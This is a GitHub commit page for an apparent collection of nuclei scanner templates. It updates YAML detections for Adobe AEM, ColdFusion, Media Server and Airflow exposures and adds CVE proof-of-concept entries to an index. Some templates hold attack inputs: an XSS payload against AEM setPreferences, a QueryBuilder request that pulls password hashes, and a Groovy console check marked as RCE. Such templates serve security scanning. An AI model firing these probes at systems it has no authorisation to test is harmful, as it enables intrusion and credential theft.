Skip to content

Commit

Permalink
20240922
Browse files Browse the repository at this point in the history
  • Loading branch information
actions-user committed Sep 22, 2024
1 parent c815775 commit 4bdd1ad
Show file tree
Hide file tree
Showing 1,544 changed files with 22,391 additions and 13,026 deletions.
2 changes: 1 addition & 1 deletion date.txt
Original file line number Diff line number Diff line change
@@ -1 +1 @@
20240921
20240922
5 changes: 5 additions & 0 deletions poc.txt
Original file line number Diff line number Diff line change
Expand Up @@ -26142,6 +26142,7 @@
./poc/cve/CVE-2023-2780.yaml
./poc/cve/CVE-2023-2781-e0e4738fafcd023dcc57e1b2c299faa6.yaml
./poc/cve/CVE-2023-2781.yaml
./poc/cve/CVE-2023-27847.yaml
./poc/cve/CVE-2023-27889-965e16401eed7d13cba5130afd395eb5.yaml
./poc/cve/CVE-2023-27889.yaml
./poc/cve/CVE-2023-27922-18b8524cd7af5c0a0b6b13ec06817981.yaml
Expand Down Expand Up @@ -28167,6 +28168,7 @@
./poc/cve/CVE-2023-3962.yaml
./poc/cve/CVE-2023-3965-8362bc8d4f1e02a8b598a0189ed82be3.yaml
./poc/cve/CVE-2023-3965.yaml
./poc/cve/CVE-2023-39650.yaml
./poc/cve/CVE-2023-39676.yaml
./poc/cve/CVE-2023-39677.yaml
./poc/cve/CVE-2023-39700.yaml
Expand Down Expand Up @@ -38694,6 +38696,7 @@
./poc/cve/CVE-2024-3667.yaml
./poc/cve/CVE-2024-3668-c8ffa38e284a09e692ef63a2e54e8547.yaml
./poc/cve/CVE-2024-3668.yaml
./poc/cve/CVE-2024-36683.yaml
./poc/cve/CVE-2024-3669-5b490dd03c192fb59ee33122e0849596.yaml
./poc/cve/CVE-2024-3669.yaml
./poc/cve/CVE-2024-3670-fec3724139e128cadbd86aa3d4c79b55.yaml
Expand Down Expand Up @@ -42652,6 +42655,7 @@
./poc/cve/CVE-2024-7313-b762e54f8085d18804da0898542a5ec1.yaml
./poc/cve/CVE-2024-7313.yaml
./poc/cve/CVE-2024-7315-fca7053f6d8d3db3a989ec962d9eabd8.yaml
./poc/cve/CVE-2024-7315.yaml
./poc/cve/CVE-2024-7317-ba5a614941cffb6dcbde33c96a783d3e.yaml
./poc/cve/CVE-2024-7317.yaml
./poc/cve/CVE-2024-7349-a333876f0ff61593d79b76123a7c37bd.yaml
Expand Down Expand Up @@ -43005,6 +43009,7 @@
./poc/cve/CVE-2024-8669-48017cad1d0f5431615877a08826da9a.yaml
./poc/cve/CVE-2024-8669.yaml
./poc/cve/CVE-2024-8680-66081216a3685413779cdd14f0f9fe12.yaml
./poc/cve/CVE-2024-8680.yaml
./poc/cve/CVE-2024-8714-03b5605b5eeba70097fb089d33700336.yaml
./poc/cve/CVE-2024-8714.yaml
./poc/cve/CVE-2024-8724-9019a55c2cb51d14586e3502543ceb09.yaml
Expand Down
6 changes: 1 addition & 5 deletions poc/adobe/adobe-coldfusion-error-detect-86.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -5,11 +5,7 @@ info:
author: philippedelteil
severity: info
description: With this template we can detect a running ColdFusion instance due to an error page.
reference:
- https://twitter.com/PhilippeDelteil/status/1418622775829348358
metadata:
verified: true
shodan-query: http.component:"Adobe ColdFusion"
reference: https://twitter.com/PhilippeDelteil/status/1418622775829348358
tags: adobe,coldfusion

requests:
Expand Down
3 changes: 1 addition & 2 deletions poc/adobe/adobe-connect-username-exposure-100.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -2,10 +2,9 @@ id: adobe-connect-username-exposure

info:
name: Adobe Connect Username Exposure
reference: https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html
author: dhiyaneshDk
severity: low
reference:
- https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html
tags: adobe,disclosure

requests:
Expand Down
53 changes: 30 additions & 23 deletions poc/adobe/adobe-media-server-115.yaml
Original file line number Diff line number Diff line change
@@ -1,23 +1,30 @@
id: adobe-media-server

info:
name: Adobe Media Server
author: dhiyaneshDK
severity: info
reference: https://www.shodan.io/search?query=http.title%3A%22Adobe+Media+Server%22
tags: panel,adobe

requests:
- method: GET
path:
- '{{BaseURL}}'

matchers-condition: and
matchers:
- type: word
words:
- '<title>Adobe Media Server</title>'

- type: status
status:
- 200
id: adobe-media-server

info:
name: Adobe Media Server Login Panel
author: dhiyaneshDK
severity: info
description: An Adobe Media Server login panel was detected.
reference:
- https://www.shodan.io/search?query=http.title%3A%22Adobe+Media+Server%22
- https://helpx.adobe.com/support/adobe-media-server.html
classification:
cwe-id: CWE-200
tags: panel,adobe

requests:
- method: GET
path:
- '{{BaseURL}}'

matchers-condition: and
matchers:
- type: word
words:
- '<title>Adobe Media Server</title>'

- type: status
status:
- 200

# Enhanced by mp on 2022/03/20
15 changes: 13 additions & 2 deletions poc/adobe/aem-default-get-servlet-138.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -3,13 +3,24 @@ info:
author: DhiyaneshDk
name: AEM DefaultGetServlet
severity: low
reference: https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43
tags: aem
description: Sensitive information might be exposed via AEM DefaultGetServlet.
reference:
- https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43
- https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/GetServletExposed.java
tags: aem,adobe


requests:
- method: GET
path:
- '{{BaseURL}}/etc'
- '{{BaseURL}}/var'
- '{{BaseURL}}/apps'
- '{{BaseURL}}/home'
- '{{BaseURL}}///etc'
- '{{BaseURL}}///var'
- '{{BaseURL}}///apps'
- '{{BaseURL}}///home'
- '{{BaseURL}}/.json'
- '{{BaseURL}}/.1.json'
- '{{BaseURL}}/....4.2.1....json'
Expand Down
16 changes: 7 additions & 9 deletions poc/adobe/aem-detection.yaml
Original file line number Diff line number Diff line change
@@ -1,19 +1,16 @@
id: aem-detection
id: favicon-detection-AEM

info:
name: Favicon based AEM Detection
author: shifacyclewala,hackergautam
name: favicon-detection-AEM (Adobe Experience Manager)
severity: info
reference:
author: shifacyclewala hackergautam
reference: |
- https://twitter.com/brsn76945860/status/1171233054951501824
- https://gist.github.com/yehgdotnet/b9dfc618108d2f05845c4d8e28c5fc6a
- https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139
- https://github.com/devanshbatham/FavFreak
- https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv
metadata:
shodan-query: http.component:"Adobe Experience Manager"
tags: aem,favicon,tech

requests:
- method: GET
path:
Expand All @@ -24,5 +21,6 @@ requests:

matchers:
- type: dsl
name: "Adobe Experience Manager (AEM)"
dsl:
- "status_code==200 && (\"-144483185\" == mmh3(base64_py(body)))"
- "status_code==200 && (\"-144483185\" == mmh3(base64_py(body)))"
8 changes: 4 additions & 4 deletions poc/adobe/aem-groovyconsole.yaml
Original file line number Diff line number Diff line change
@@ -1,15 +1,15 @@
id: aem-groovyconsole
info:
name: AEM Groovy console exposed
author: d3sca
name: AEM Groovy console enabled
author: twitter.com/Dheerajmadhukar
severity: critical
description: Groovy console is exposed.
description: Groovy console is exposed, RCE is possible.
reference: https://hackerone.com/reports/672243
tags: aem
requests:
- method: GET
path:
- "{{BaseURL}}/groovyconsole"
- "{{BaseURL}}/groovyconsole.html"
headers:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US,en;q=0.9,hi;q=0.8
Expand Down
14 changes: 4 additions & 10 deletions poc/adobe/aem-hash-querybuilder.yaml
Original file line number Diff line number Diff line change
@@ -1,32 +1,26 @@
id: aem-hash-querybuilder

info:
author: DhiyaneshDk
name: Query hashed password via QueryBuilder Servlet
author: DhiyaneshDk
severity: medium
reference: https://twitter.com/AEMSecurity/status/1372392101829349376
reference:
- https://twitter.com/AEMSecurity/status/1372392101829349376
tags: aem

requests:
- raw:
- |
GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- '"success":true'
- 'rep:password'
condition: and
2 changes: 1 addition & 1 deletion poc/adobe/aem-jcr-querybuilder-166.yaml
Original file line number Diff line number Diff line change
@@ -1,8 +1,8 @@
id: aem-jcr-querybuilder

info:
author: DhiyaneshDk
name: Query JCR role via QueryBuilder Servlet
author: DhiyaneshDk
severity: info
tags: aem

Expand Down
6 changes: 3 additions & 3 deletions poc/adobe/aem-merge-metadata-servlet-172.yaml
Original file line number Diff line number Diff line change
@@ -1,13 +1,13 @@
id: aem-merge-metadata-servlet

info:
author: DhiyaneshDk
name: AEM MergeMetadataServlet
author: DhiyaneshDk
severity: info
reference: https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91
reference:
- https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91
tags: aem


requests:
- method: GET
path:
Expand Down
24 changes: 20 additions & 4 deletions poc/adobe/aem-querybuilder-json-servlet.yaml
Original file line number Diff line number Diff line change
@@ -1,23 +1,39 @@
id: aem-querybuilder-json-servlet

info:
author: DhiyaneshDk
name: AEM QueryBuilder Json Servlet
author: DhiyaneshDk
severity: info
reference: https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html
tags: aem

description: Sensitive information might be exposed via AEMs QueryBuilderServlet or QueryBuilderFeedServlet.
reference:
- https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html
- https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/QueryBuilderExposed.java
tags: aem,adobe

requests:
- method: GET
path:
- '{{BaseURL}}/bin/querybuilder.json'
- '{{BaseURL}}/bin/querybuilder.json.servlet'
- '{{BaseURL}}///bin///querybuilder.json'
- '{{BaseURL}}///bin///querybuilder.json.servlet'
- '{{BaseURL}}/bin/querybuilder.feed'
- '{{BaseURL}}/bin/querybuilder.feed.servlet'
- '{{BaseURL}}///bin///querybuilder.feed'
- ' {{BaseURL}}///bin///querybuilder.feed.servlet'

stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "application/json"
part: header

- type: word
words:
- 'success'
Expand Down
10 changes: 7 additions & 3 deletions poc/adobe/aem-setpreferences-xss-189.yaml
Original file line number Diff line number Diff line change
@@ -1,18 +1,21 @@
id: aem-setpreferences-xss

info:
name: AEM setPreferences - Cross-Site Scripting
name: AEM setPreferences XSS
author: zinminphy0,dhiyaneshDK
severity: medium
reference:
- https://www.youtube.com/watch?v=VwLSUHNhrOw&t=142s
- https://github.com/projectdiscovery/nuclei-templates/issues/3225
- https://twitter.com/zin_min_phyo/status/1465394815042916352
severity: medium
tags: aem,xss

requests:
- method: GET
path:
- "{{BaseURL}}/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=<svg/onload=confirm(document.domain);>//a"
- "{{BaseURL}}/content/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=<svg/onload=confirm(document.domain);>//a"

stop-at-first-match: true
matchers-condition: and
matchers:
Expand All @@ -21,6 +24,7 @@ requests:
- "<svg/onload=confirm(document.domain);>"
- 'A JSONObject text must begin with'
condition: and

- type: status
status:
- 400
- 400
3 changes: 3 additions & 0 deletions poc/airflow/airflow-debug.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -4,6 +4,9 @@ info:
name: Airflow Debug Trace
author: pdteam
severity: low
metadata:
verified: true
shodan-query: title:"Airflow - DAGs"
tags: apache,airflow,fpd

requests:
Expand Down
Loading

0 comments on commit 4bdd1ad

Please sign in to comment.